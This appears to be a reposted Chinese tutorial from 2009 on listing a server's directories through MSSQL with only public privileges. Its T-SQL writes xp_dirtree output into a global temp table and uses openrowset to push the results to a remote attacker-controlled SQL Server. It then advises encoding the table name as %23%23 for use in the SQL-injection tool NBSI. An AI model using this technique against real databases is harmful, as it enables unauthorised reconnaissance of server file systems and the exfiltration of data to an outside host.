当前位置: 首页 > 图文教程 > 数据库 > MSSQL > Public权限下的列目录

MSSQL
用Oracle和SQL Server数据库组合利弊分析
3个SQL视图搞定所有SqlServer数据库字典
使用SQL Server数据库的查询累计值
如何维护SQL Server的“交易日志”
SQL Server扩展存储过程实现远程备份与恢复
SQL Server 的存储过程
SQL Server 数据库嵌套子查询
如何使用SQL 事件探查器?
SQL Server 2008的新压缩特性
改进SQL Server数据库系统安全五步走
把SQL数据库部署到远程主机环境
SQL Server 2008综合数据可编程性
SQL Server 2005 数据维护实务
详细介绍微软SQL Server 2008
SQL Server数据库管理常用的SQL和T-SQL语句
从算法入手讲解SQL Server典例实现过程
ASP.NET连接Access和SQL Server数据库
SQL Server如何识别真实和自动创建的索引
SQL Server 2005数据转换服务的疑难解答
利用SQL Server 2005同义字缩短开发时间

MSSQL 中的 Public权限下的列目录


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-30   浏览: 545 ::
收藏到网摘: n/a

  提起public权限的用户估计很多人也觉得郁闷了吧~N久以前看了一篇《论在mssql中public和db_owner权限下拿到webshell或是系统权限》的文章(名字真长-_-!!!),里面说到没办法利用xp_regread,xp_dirtree…这些存储过程,原因是public没有办法建表,我在这里矫正一下其实public是可以建表的,使这些存储过程能利用上,071088b104HaKX8E看下面的代码吧
  --建立一个临时表,一般的表我们是无办法建立的,我们只能建立临时表
  #-----为本地临时表
  ##----为全局临时表
  create table ##nonamed(
  dir ntext,
  num int
  )
  --调用存储过程把执行回来的数据存到临时表里面
  insert ##nonamed execute master..xp_dirtree 'c:\',1
  --然后采用openrowset函数把临时表的数据导到本地MSSQL 的dirtree表里面了
  insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')
  select * from ##nonamed
  以上方法,也就是说public可以遍历用户服务器的目录
  在NBSI中,只要把临时表名加前加##就可以了,但要注意URL转码,即写成:%23%23nonamed就OK了!